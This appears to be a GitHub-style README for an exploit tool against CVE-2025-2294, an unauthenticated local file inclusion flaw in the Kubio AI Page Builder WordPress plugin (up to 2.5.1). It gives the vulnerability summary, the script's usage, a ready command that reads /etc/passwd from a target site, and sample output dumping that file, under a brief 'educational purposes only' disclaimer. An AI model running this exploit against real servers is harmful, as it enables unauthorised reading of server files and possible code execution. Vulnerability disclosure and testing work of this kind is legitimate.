# 🚨 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

## 📝 Description

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via the `kubio_hybrid_theme_load_template` function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

- **CVE:** CVE-2025-2294
- **CVSS:** 9.8 (Critical)
- **Publicly Published:** March 27, 2025
- **Last Updated:** March 27, 2025

## 💥 Exploit Details

This script exploits the vulnerability in the Kubio AI Page Builder plugin to include and execute arbitrary files on the server. The exploit allows unauthenticated attackers to read sensitive files from the server.

### ⚙️ Requirements

- Python 3.x
- `requests` library

### 🚀 Usage

```bash
usage: CVE-2025-2294.py [-h] -u URL [-f FILE]

Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target base URL (e.g., https://example.com)
  -f FILE, --file FILE  File to read (default: /etc/passwd)
```

### 📋 Example

```bash
python3 CVE-2025-2294.py -u https://targetwebsite.com -f /etc/passwd
```

### 🔍 Output

```plaintext
[+] Target is vulnerable. Exploiting...
[+] Exploit successful. File content:
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:992:992:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:102::/nonexistent:/usr/sbin/nologin
tss:x:101:104:TPM software stack,,,:/var/lib/tpm:/bin/false
strongswan:x:102:65534::/var/lib/strongswan:/usr/sbin/nologin
tcpdump:x:103:105::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin


```

## ⚠️ Disclaimer

This exploit is provided for educational purposes only. The author is not responsible for any misuse of this tool. Use it at your own risk.

*By: Nxploited | Khaled Alenazi*
